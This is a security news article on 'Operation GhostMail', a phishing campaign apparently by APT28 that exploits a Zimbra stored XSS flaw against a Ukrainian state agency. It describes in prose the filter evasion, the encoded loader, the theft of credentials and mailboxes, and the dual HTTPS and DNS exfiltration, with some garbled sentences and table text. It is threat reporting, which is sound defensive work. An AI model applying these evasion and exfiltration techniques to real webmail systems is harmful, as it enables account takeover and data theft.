Russian APT Exploits Zimbra XSS In GhostMail Attacks On Ukrainian Government

Seqrite Labs has found a very specific phishing campaign called "Operation GhostMail." The attack took advantage of a Cross-Site Scripting (XSS) flaw in Zimbra Collaboration Suite (ZCS) to get into the Ukrainian State Hydrology Agency This article explores phishing email looks. .

This campaign is different from most attacks because it only uses the body of the email and doesn't include any malicious attachments, links, or macros. With medium confidence, the Russian state-sponsored group APT28 is thought to be behind the operation, which shows advanced stealth by only working in the victim's browser. Weakness and Attack Path The attack starts with a phishing email that looks like a normal internship request. The message was sent on January 22, 2026, and it came from a hacked student account at the National Academy of Internal Affairs (NAVS).

A hidden JavaScript payload runs silently when the victim opens the email in the Zimbra Classic UI. This takes advantage of CVE-2025-66376, a stored XSS flaw that was fixed in November 2025 because CSS @import directives weren't cleaned up properly. The attackers added noise directly to the HTML tag names to get around Zimbra's built-in AntiSamy security filter.

GhostMail's Targets Ukraine Mail (Source: seqrite) This let the malformed tags get past regex-based checks while still being valid for the browser. When the browser puts the broken code back together, a Base64-encoded loader runs.

This first script decodes the last payload, puts it into the top-level document, and then leaves the webmail sandbox to get the user's active session context and cookies. GhostMail's Goals Stealthy Data Exfiltration in Ukraine Mail (Source: seqrite) The malware uses Zimbra's real SOAP API to do things it shouldn't while the payload is still in the browser's memory. The script makes sure that its requests look exactly like normal webmail activity by getting the CSRF token from local storage.

The stealer does nine things at once to steal as much data as possible. These include getting login credentials, session tokens, backup 2FA recovery codes, and passwords saved in the browser. GhostMail's Goals Ukraine Mail (Source: seqrite) It also creates long-term persistence by silently creating an app-specific password and letting IMAP access to the hacked account.

Part of the attack Technical Information Target Area The Ukrainian Government's State Hydrology Agency Used Flaw CVE-2025-66376 (ZCS Stored XSS) How it will be delivered 90-day email archives, 2FA codes, and passwords were stolen from HTML emails that had JavaScript embedded in them. Exfiltration Dual-channel: HTTPS and Base32 DNS Threat Actor APT28 / Fancy Bear (Medium Confidence) The worst thing that can happen is that the victim's whole mailbox is stolen. The seqrite script uses Zimbra's built-in export feature to download emails from the last 90 days.

The stolen data is sent to the command-and-control (C2) domain zimbrasoft[.]com[. ]ua using a dual-channel method to make sure it gets there. HTTPS is used to send big data blobs, and Base32 is used to encode smaller pieces of data and send them through DNS queries to get around standard network blocks.